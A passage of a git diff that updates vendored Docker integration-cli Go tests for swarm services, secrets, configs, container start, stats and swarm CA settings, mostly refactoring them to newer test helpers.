d.Cmd("service", "update", "test", "--label-rm", "foo2") + out, err = d.Cmd("service", "update", "--detach", "test", "--label-rm", "foo2") c.Assert(err, checker.IsNil, check.Commentf(out)) - service = d.getService(c, "test") + service = d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 1) c.Assert(service.Spec.Labels["foo2"], checker.Equals, "") - out, err = d.Cmd("service", "update", "test", "--label-rm", "foo") + out, err = d.Cmd("service", "update", "--detach", "test", "--label-rm", "foo") c.Assert(err, checker.IsNil, check.Commentf(out)) - service = d.getService(c, "test") + service = d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 0) c.Assert(service.Spec.Labels["foo"], checker.Equals, "") // now make sure we can add again - out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar") + out, err = d.Cmd("service", "update", "--detach", "test", "--label-add", "foo=bar") c.Assert(err, checker.IsNil, check.Commentf(out)) - service = d.getService(c, "test") + service = d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 1) c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar") } @@ -90,21 +55,21 @@ func (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) { func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) { d := s.AddDaemon(c, true, true) testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ Name: testName, }, - []byte("TESTINGDATA"), + Data: []byte("TESTINGDATA"), }) c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) testTarget := "testing" serviceName := "test" - out, err := d.Cmd("service", "create", "--name", serviceName, "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) // add secret - out, 
err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) + out, err = d.Cmd("service", "update", "--detach", "test", "--secret-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) @@ -119,7 +84,7 @@ func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) { c.Assert(refs[0].File.Name, checker.Equals, testTarget) // remove - out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-rm", testName) + out, err = d.Cmd("service", "update", "--detach", "test", "--secret-rm", testName) c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) @@ -128,3 +93,45 @@ func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) { c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) c.Assert(refs, checker.HasLen, 0) } + +func (s *DockerSwarmSuite) TestServiceUpdateConfigs(c *check.C) { + d := s.AddDaemon(c, true, true) + testName := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + testTarget := "/testing" + serviceName := "test" + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // add config + out, err = d.Cmd("service", "update", "--detach", "test", "--config-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", 
serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.ConfigReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 1) + + c.Assert(refs[0].ConfigName, checker.Equals, testName) + c.Assert(refs[0].File, checker.Not(checker.IsNil)) + c.Assert(refs[0].File.Name, checker.Equals, testTarget) + + // remove + out, err = d.Cmd("service", "update", "--detach", "test", "--config-rm", testName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName) + c.Assert(err, checker.IsNil) + + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 0) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go index fb896d52d5..f50b5bbf6d 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go @@ -16,7 +16,7 @@ import ( func (s *DockerSuite) TestClientSetsTLSServerName(c *check.C) { c.Skip("Flakey test") // there may be more than one hit to the server for each registry request - serverNameReceived := []string{} + var serverNameReceived []string var serverName string virtualHostServer := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go deleted file mode 100644 index fd9b15449d..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go +++ /dev/null @@ -1,186 +0,0 @@ -package main - -import ( - "encoding/json" - "io/ioutil" - "os" - "sort" - "strings" - - "github.com/docker/docker/api/types/swarm" - 
"github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSwarmSuite) TestStackRemoveUnknown(c *check.C) { - d := s.AddDaemon(c, true, true) - - stackArgs := append([]string{"stack", "remove", "UNKNOWN_STACK"}) - - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") -} - -func (s *DockerSwarmSuite) TestStackPSUnknown(c *check.C) { - d := s.AddDaemon(c, true, true) - - stackArgs := append([]string{"stack", "ps", "UNKNOWN_STACK"}) - - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") -} - -func (s *DockerSwarmSuite) TestStackServicesUnknown(c *check.C) { - d := s.AddDaemon(c, true, true) - - stackArgs := append([]string{"stack", "services", "UNKNOWN_STACK"}) - - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") -} - -func (s *DockerSwarmSuite) TestStackDeployComposeFile(c *check.C) { - d := s.AddDaemon(c, true, true) - - testStackName := "testdeploy" - stackArgs := []string{ - "stack", "deploy", - "--compose-file", "fixtures/deploy/default.yaml", - testStackName, - } - out, err := d.Cmd(stackArgs...) 
- c.Assert(err, checker.IsNil, check.Commentf(out)) - - out, err = d.Cmd("stack", "ls") - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "NAME SERVICES\n"+"testdeploy 2\n") - - out, err = d.Cmd("stack", "rm", testStackName) - c.Assert(err, checker.IsNil) - out, err = d.Cmd("stack", "ls") - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "NAME SERVICES\n") -} - -func (s *DockerSwarmSuite) TestStackDeployWithSecretsTwice(c *check.C) { - d := s.AddDaemon(c, true, true) - - out, err := d.Cmd("secret", "create", "outside", "fixtures/secrets/default") - c.Assert(err, checker.IsNil, check.Commentf(out)) - - testStackName := "testdeploy" - stackArgs := []string{ - "stack", "deploy", - "--compose-file", "fixtures/deploy/secrets.yaml", - testStackName, - } - out, err = d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", "testdeploy_web") - c.Assert(err, checker.IsNil) - - var refs []swarm.SecretReference - c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) - c.Assert(refs, checker.HasLen, 3) - - sort.Sort(sortSecrets(refs)) - c.Assert(refs[0].SecretName, checker.Equals, "outside") - c.Assert(refs[1].SecretName, checker.Equals, "testdeploy_special") - c.Assert(refs[1].File.Name, checker.Equals, "special") - c.Assert(refs[2].SecretName, checker.Equals, "testdeploy_super") - c.Assert(refs[2].File.Name, checker.Equals, "foo.txt") - c.Assert(refs[2].File.Mode, checker.Equals, os.FileMode(0400)) - - // Deploy again to ensure there are no errors when secret hasn't changed - out, err = d.Cmd(stackArgs...) 
- c.Assert(err, checker.IsNil, check.Commentf(out)) -} - -func (s *DockerSwarmSuite) TestStackRemove(c *check.C) { - d := s.AddDaemon(c, true, true) - - stackName := "testdeploy" - stackArgs := []string{ - "stack", "deploy", - "--compose-file", "fixtures/deploy/remove.yaml", - stackName, - } - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - out, err = d.Cmd("stack", "ps", stackName) - c.Assert(err, checker.IsNil) - c.Assert(strings.Split(strings.TrimSpace(out), "\n"), checker.HasLen, 2) - - out, err = d.Cmd("stack", "rm", stackName) - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Removing service testdeploy_web") - c.Assert(out, checker.Contains, "Removing network testdeploy_default") - c.Assert(out, checker.Contains, "Removing secret testdeploy_special") -} - -type sortSecrets []swarm.SecretReference - -func (s sortSecrets) Len() int { return len(s) } -func (s sortSecrets) Swap(i, j int) { s[i], s[j] = s[j], s[i] } -func (s sortSecrets) Less(i, j int) bool { return s[i].SecretName < s[j].SecretName } - -// testDAB is the DAB JSON used for testing. 
-// TODO: Use template/text and substitute "Image" with the result of -// `docker inspect --format '{{index .RepoDigests 0}}' busybox:latest` -const testDAB = `{ - "Version": "0.1", - "Services": { - "srv1": { - "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0", - "Command": ["top"] - }, - "srv2": { - "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0", - "Command": ["tail"], - "Args": ["-f", "/dev/null"] - } - } -}` - -func (s *DockerSwarmSuite) TestStackDeployWithDAB(c *check.C) { - testRequires(c, ExperimentalDaemon) - // setup - testStackName := "test" - testDABFileName := testStackName + ".dab" - defer os.RemoveAll(testDABFileName) - err := ioutil.WriteFile(testDABFileName, []byte(testDAB), 0444) - c.Assert(err, checker.IsNil) - d := s.AddDaemon(c, true, true) - // deploy - stackArgs := []string{ - "stack", "deploy", - "--bundle-file", testDABFileName, - testStackName, - } - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Loading bundle from test.dab\n") - c.Assert(out, checker.Contains, "Creating service test_srv1\n") - c.Assert(out, checker.Contains, "Creating service test_srv2\n") - // ls - stackArgs = []string{"stack", "ls"} - out, err = d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "NAME SERVICES\n"+"test 2\n") - // rm - stackArgs = []string{"stack", "rm", testStackName} - out, err = d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Removing service test_srv1\n") - c.Assert(out, checker.Contains, "Removing service test_srv2\n") - // ls (empty) - stackArgs = []string{"stack", "ls"} - out, err = d.Cmd(stackArgs...) 
- c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "NAME SERVICES\n") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go index b1cea35872..cbe917bf4f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go @@ -2,12 +2,13 @@ package main import ( "fmt" - "os/exec" "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" "github.com/go-check/check" + "gotest.tools/icmd" ) // Regression test for https://github.com/docker/docker/issues/7843 @@ -42,18 +43,15 @@ func (s *DockerSuite) TestStartAttachReturnsOnError(c *check.C) { // gh#8555: Exit code should be passed through when using start -a func (s *DockerSuite) TestStartAttachCorrectExitCode(c *check.C) { testRequires(c, DaemonIsLinux) - out, _, _ := dockerCmdWithStdoutStderr(c, "run", "-d", "busybox", "sh", "-c", "sleep 2; exit 1") + out := cli.DockerCmd(c, "run", "-d", "busybox", "sh", "-c", "sleep 2; exit 1").Stdout() out = strings.TrimSpace(out) // make sure the container has exited before trying the "start -a" - dockerCmd(c, "wait", out) - - startOut, exitCode, err := dockerCmdWithError("start", "-a", out) - // start command should fail - c.Assert(err, checker.NotNil, check.Commentf("startOut: %s", startOut)) - // start -a did not respond with proper exit code - c.Assert(exitCode, checker.Equals, 1, check.Commentf("startOut: %s", startOut)) + cli.DockerCmd(c, "wait", out) + cli.Docker(cli.Args("start", "-a", out)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) } func (s *DockerSuite) TestStartAttachSilent(c *check.C) { @@ -96,7 +94,6 @@ func (s *DockerSuite) TestStartRecordError(c *check.C) { func (s *DockerSuite) TestStartPausedContainer(c *check.C) { // Windows does not 
support pausing containers testRequires(c, IsPausable) - defer unpauseAllContainers() runSleepingContainer(c, "-d", "--name", "testing") @@ -106,7 +103,7 @@ func (s *DockerSuite) TestStartPausedContainer(c *check.C) { // an error should have been shown that you cannot start paused container c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) // an error should have been shown that you cannot start paused container - c.Assert(out, checker.Contains, "Cannot start a paused container, try unpause instead.") + c.Assert(strings.ToLower(out), checker.Contains, "cannot start a paused container, try unpause instead") } func (s *DockerSuite) TestStartMultipleContainers(c *check.C) { @@ -162,7 +159,7 @@ func (s *DockerSuite) TestStartAttachMultipleContainers(c *check.C) { // err shouldn't be nil because start will fail c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) // output does not correspond to what was expected - c.Assert(out, checker.Contains, "You cannot start and attach multiple containers at once.") + c.Assert(out, checker.Contains, "you cannot start and attach multiple containers at once") } // confirm the state of all the containers be stopped @@ -176,14 +173,17 @@ func (s *DockerSuite) TestStartAttachMultipleContainers(c *check.C) { // Test case for #23716 func (s *DockerSuite) TestStartAttachWithRename(c *check.C) { testRequires(c, DaemonIsLinux) - dockerCmd(c, "create", "-t", "--name", "before", "busybox") + cli.DockerCmd(c, "create", "-t", "--name", "before", "busybox") go func() { - c.Assert(waitRun("before"), checker.IsNil) - dockerCmd(c, "rename", "before", "after") - dockerCmd(c, "stop", "--time=2", "after") + cli.WaitRun(c, "before") + cli.DockerCmd(c, "rename", "before", "after") + cli.DockerCmd(c, "stop", "--time=2", "after") }() - _, stderr, _, _ := runCommandWithStdoutStderr(exec.Command(dockerBinary, "start", "-a", "before")) - c.Assert(stderr, checker.Not(checker.Contains), "No such container") + // FIXME(vdemeester) the 
intent is not clear and potentially racey + result := cli.Docker(cli.Args("start", "-a", "before")).Assert(c, icmd.Expected{ + ExitCode: 137, + }) + c.Assert(result.Stderr(), checker.Not(checker.Contains), "No such container") } func (s *DockerSuite) TestStartReturnCorrectExitCode(c *check.C) { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go index 5cb1a3ea02..454836367f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go @@ -7,7 +7,8 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" "github.com/go-check/check" ) @@ -33,7 +34,7 @@ func (s *DockerSuite) TestStatsNoStream(c *check.C) { select { case outerr := <-ch: c.Assert(outerr.err, checker.IsNil, check.Commentf("Error running stats: %v", outerr.err)) - c.Assert(string(outerr.out), checker.Contains, id) //running container wasn't present in output + c.Assert(string(outerr.out), checker.Contains, id[:12]) //running container wasn't present in output case <-time.After(3 * time.Second): statsCmd.Process.Kill() c.Fatalf("stats did not return immediately when not streaming") @@ -130,6 +131,7 @@ func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) { stdout, err := statsCmd.StdoutPipe() c.Assert(err, check.IsNil) c.Assert(statsCmd.Start(), check.IsNil) + go statsCmd.Wait() defer statsCmd.Process.Kill() go func() { @@ -146,7 +148,7 @@ func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) { } }() - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil) id <- strings.TrimSpace(out)[:12] @@ -157,3 +159,22 @@ func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) 
{ // ignore, done } } + +func (s *DockerSuite) TestStatsFormatAll(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + + cli.DockerCmd(c, "run", "-d", "--name=RunningOne", "busybox", "top") + cli.WaitRun(c, "RunningOne") + cli.DockerCmd(c, "run", "-d", "--name=ExitedOne", "busybox", "top") + cli.DockerCmd(c, "stop", "ExitedOne") + cli.WaitExited(c, "ExitedOne", 5*time.Second) + + out := cli.DockerCmd(c, "stats", "--no-stream", "--format", "{{.Name}}").Combined() + c.Assert(out, checker.Contains, "RunningOne") + c.Assert(out, checker.Not(checker.Contains), "ExitedOne") + + out = cli.DockerCmd(c, "stats", "--all", "--no-stream", "--format", "{{.Name}}").Combined() + c.Assert(out, checker.Contains, "RunningOne") + c.Assert(out, checker.Contains, "ExitedOne") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go deleted file mode 100644 index 103d01374c..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go +++ /dev/null @@ -1,17 +0,0 @@ -package main - -import ( - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestStopContainerWithRestartPolicyAlways(c *check.C) { - dockerCmd(c, "run", "--name", "verifyRestart1", "-d", "--restart=always", "busybox", "false") - dockerCmd(c, "run", "--name", "verifyRestart2", "-d", "--restart=always", "busybox", "false") - - c.Assert(waitRun("verifyRestart1"), checker.IsNil) - c.Assert(waitRun("verifyRestart2"), checker.IsNil) - - dockerCmd(c, "stop", "verifyRestart1") - dockerCmd(c, "stop", "verifyRestart2") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go index 8eae162cba..057c0d94c8 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go +++ 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go @@ -4,7 +4,9 @@ package main import ( "bytes" + "context" "encoding/json" + "encoding/pem" "fmt" "io/ioutil" "net/http" @@ -14,20 +16,27 @@ import ( "strings" "time" + "github.com/cloudflare/cfssl/helpers" + "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/daemon" "github.com/docker/libnetwork/driverapi" "github.com/docker/libnetwork/ipamapi" remoteipam "github.com/docker/libnetwork/ipams/remote/api" + "github.com/docker/swarmkit/ca/keyutils" "github.com/go-check/check" "github.com/vishvananda/netlink" + "gotest.tools/fs" + "gotest.tools/icmd" ) func (s *DockerSwarmSuite) TestSwarmUpdate(c *check.C) { d := s.AddDaemon(c, true, true) getSpec := func() swarm.Spec { - sw := d.getSwarm(c) + sw := d.GetSwarm(c) return sw.Spec } @@ -44,27 +53,70 @@ func (s *DockerSwarmSuite) TestSwarmUpdate(c *check.C) { c.Assert(out, checker.Contains, "minimum certificate expiry time") spec = getSpec() c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour) + + // passing an external CA (this is without starting a root rotation) does not fail + cli.Docker(cli.Args("swarm", "update", "--external-ca", "protocol=cfssl,url=https://something.org", + "--external-ca", "protocol=cfssl,url=https://somethingelse.org,cacert=fixtures/https/ca.pem"), + cli.Daemon(d)).Assert(c, icmd.Success) + + expected, err := ioutil.ReadFile("fixtures/https/ca.pem") + c.Assert(err, checker.IsNil) + + spec = getSpec() + c.Assert(spec.CAConfig.ExternalCAs, checker.HasLen, 2) + c.Assert(spec.CAConfig.ExternalCAs[0].CACert, checker.Equals, "") + c.Assert(spec.CAConfig.ExternalCAs[1].CACert, checker.Equals, string(expected)) + + // passing an invalid external CA fails + tempFile := fs.NewFile(c, "testfile", 
fs.WithContent("fakecert")) + defer tempFile.Remove() + + result := cli.Docker(cli.Args("swarm", "update", + "--external-ca", fmt.Sprintf("protocol=cfssl,url=https://something.org,cacert=%s", tempFile.Path())), + cli.Daemon(d)) + result.Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "must be in PEM format", + }) } func (s *DockerSwarmSuite) TestSwarmInit(c *check.C) { d := s.AddDaemon(c, false, false) getSpec := func() swarm.Spec { - sw := d.getSwarm(c) + sw := d.GetSwarm(c) return sw.Spec } - out, err := d.Cmd("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + // passing an invalid external CA fails + tempFile := fs.NewFile(c, "testfile", fs.WithContent("fakecert")) + defer tempFile.Remove() + + result := cli.Docker(cli.Args("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s", + "--external-ca", fmt.Sprintf("protocol=cfssl,url=https://somethingelse.org,cacert=%s", tempFile.Path())), + cli.Daemon(d)) + result.Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "must be in PEM format", + }) + + cli.Docker(cli.Args("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s", + "--external-ca", "protocol=cfssl,url=https://something.org", + "--external-ca", "protocol=cfssl,url=https://somethingelse.org,cacert=fixtures/https/ca.pem"), + cli.Daemon(d)).Assert(c, icmd.Success) + + expected, err := ioutil.ReadFile("fixtures/https/ca.pem") + c.Assert(err, checker.IsNil) spec := getSpec() c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour) c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 11*time.Second) + c.Assert(spec.CAConfig.ExternalCAs, checker.HasLen, 2) + c.Assert(spec.CAConfig.ExternalCAs[0].CACert, checker.Equals, "") + c.Assert(spec.CAConfig.ExternalCAs[1].CACert, checker.Equals, string(expected)) - c.Assert(d.Leave(true), checker.IsNil) - time.Sleep(500 * time.Millisecond) // 
https://github.com/docker/swarmkit/issues/1421 - out, err = d.Cmd("swarm", "init") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + c.Assert(d.SwarmLeave(true), checker.IsNil) + cli.Docker(cli.Args("swarm", "init"), cli.Daemon(d)).Assert(c, icmd.Success) spec = getSpec() c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 90*24*time.Hour) @@ -74,15 +126,12 @@ func (s *DockerSwarmSuite) TestSwarmInit(c *check.C) { func (s *DockerSwarmSuite) TestSwarmInitIPv6(c *check.C) { testRequires(c, IPv6) d1 := s.AddDaemon(c, false, false) - out, err := d1.Cmd("swarm", "init", "--listen-addr", "::1") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + cli.Docker(cli.Args("swarm", "init", "--listen-add", "::1"), cli.Daemon(d1)).Assert(c, icmd.Success) d2 := s.AddDaemon(c, false, false) - out, err = d2.Cmd("swarm", "join", "::1") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + cli.Docker(cli.Args("swarm", "join", "::1"), cli.Daemon(d2)).Assert(c, icmd.Success) - out, err = d2.Cmd("info") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + out := cli.Docker(cli.Args("info"), cli.Daemon(d2)).Assert(c, icmd.Success).Combined() c.Assert(out, checker.Contains, "Swarm: active") } @@ -96,49 +145,42 @@ func (s *DockerSwarmSuite) TestSwarmInitUnspecifiedAdvertiseAddr(c *check.C) { func (s *DockerSwarmSuite) TestSwarmIncompatibleDaemon(c *check.C) { // init swarm mode and stop a daemon d := s.AddDaemon(c, true, true) - info, err := d.info() - c.Assert(err, checker.IsNil) + info := d.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - c.Assert(d.Stop(), checker.IsNil) + d.Stop(c) // start a daemon with --cluster-store and --cluster-advertise - err = d.Start("--cluster-store=consul://consuladdr:consulport/some/path", "--cluster-advertise=1.1.1.1:2375") + err := d.StartWithError("--cluster-store=consul://consuladdr:consulport/some/path", "--cluster-advertise=1.1.1.1:2375") c.Assert(err, 
checker.NotNil) - content, _ := ioutil.ReadFile(d.logFile.Name()) + content, err := d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, "--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode") // start a daemon with --live-restore - err = d.Start("--live-restore") + err = d.StartWithError("--live-restore") c.Assert(err, checker.NotNil) - content, _ = ioutil.ReadFile(d.logFile.Name()) + content, err = d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, "--live-restore daemon configuration is incompatible with swarm mode") // restart for teardown - c.Assert(d.Start(), checker.IsNil) -} - -// Test case for #24090 -func (s *DockerSwarmSuite) TestSwarmNodeListHostname(c *check.C) { - d := s.AddDaemon(c, true, true) - - // The first line should contain "HOSTNAME" - out, err := d.Cmd("node", "ls") - c.Assert(err, checker.IsNil) - c.Assert(strings.Split(out, "\n")[0], checker.Contains, "HOSTNAME") + d.Start(c) } func (s *DockerSwarmSuite) TestSwarmServiceTemplatingHostname(c *check.C) { d := s.AddDaemon(c, true, true) + hostname, err := d.Cmd("node", "inspect", "--format", "{{.Description.Hostname}}", "self") + c.Assert(err, checker.IsNil, check.Commentf(hostname)) - out, err := d.Cmd("service", "create", "--name", "test", "--hostname", "{{.Service.Name}}-{{.Task.Slot}}", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "test", "--hostname", "{{.Service.Name}}-{{.Task.Slot}}-{{.Node.Hostname}}", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) // make sure task has been deployed. 
- waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) - containers := d.activeContainers() + containers := d.ActiveContainers(c) out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.Config.Hostname}}", containers[0]) c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.Split(out, "\n")[0], checker.Equals, "test-1", check.Commentf("hostname with templating invalid")) + c.Assert(strings.Split(out, "\n")[0], checker.Equals, "test-1-"+strings.Split(hostname, "\n")[0], check.Commentf("hostname with templating invalid")) } // Test case for #24270 @@ -148,15 +190,15 @@ func (s *DockerSwarmSuite) TestSwarmServiceListFilter(c *check.C) { name1 := "redis-cluster-md5" name2 := "redis-cluster" name3 := "other-cluster" - out, err := d.Cmd("service", "create", "--name", name1, "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name1, "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - out, err = d.Cmd("service", "create", "--name", name2, "busybox", "top") + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name2, "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - out, err = d.Cmd("service", "create", "--name", name3, "busybox", "top") + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name3, "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") @@ -206,12 +248,12 @@ func (s *DockerSwarmSuite) TestSwarmNodeTaskListFilter(c *check.C) { d := s.AddDaemon(c, true, true) name := "redis-cluster-md5" - out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top") + out, err := d.Cmd("service", 
"create", "--detach", "--no-resolve-image", "--name", name, "--replicas=3", "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 3) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 3) filter := "name=redis-cluster" @@ -232,63 +274,35 @@ func (s *DockerSwarmSuite) TestSwarmNodeTaskListFilter(c *check.C) { func (s *DockerSwarmSuite) TestSwarmPublishAdd(c *check.C) { d := s.AddDaemon(c, true, true) - testCases := []struct { - name string - publishAdd []string - ports string - }{ - { - name: "simple-syntax", - publishAdd: []string{ - "80:80", - "80:80", - "80:80", - "80:20", - }, - ports: "[{ tcp 80 80 ingress}]", - }, - { - name: "complex-syntax", - publishAdd: []string{ - "target=90,published=90,protocol=tcp,mode=ingress", - "target=90,published=90,protocol=tcp,mode=ingress", - "target=90,published=90,protocol=tcp,mode=ingress", - "target=30,published=90,protocol=tcp,mode=ingress", - }, - ports: "[{ tcp 90 90 ingress}]", - }, - } - - for _, tc := range testCases { - out, err := d.Cmd("service", "create", "--name", 